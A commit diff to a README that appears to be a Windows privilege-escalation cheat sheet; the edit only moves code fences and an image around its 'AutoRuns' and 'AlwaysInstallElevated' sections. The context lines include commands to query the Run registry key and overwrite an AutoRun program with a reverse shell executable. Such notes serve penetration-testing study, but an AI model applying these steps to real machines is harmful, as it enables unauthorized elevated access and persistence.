Update README.md
This commit is contained in:
@@ -1333,10 +1333,6 @@ net start dllsvc
|
|||||||
##### Always Install Elevated
|
##### Always Install Elevated
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||
#########################################################################
|
#########################################################################
|
||||||
#### 1. AutoRuns ########################################################
|
#### 1. AutoRuns ########################################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
@@ -1353,8 +1349,12 @@ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|||||||
|
|
||||||
# Copy our reverse shell executable to overwrite the AutoRun executable:
|
# Copy our reverse shell executable to overwrite the AutoRun executable:
|
||||||
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
```ps1
|
||||||
#########################################################################
|
#########################################################################
|
||||||
#### 2. AlwaysInstallElevated ###########################################
|
#### 2. AlwaysInstallElevated ###########################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|||||||
Reference in New Issue
Block a user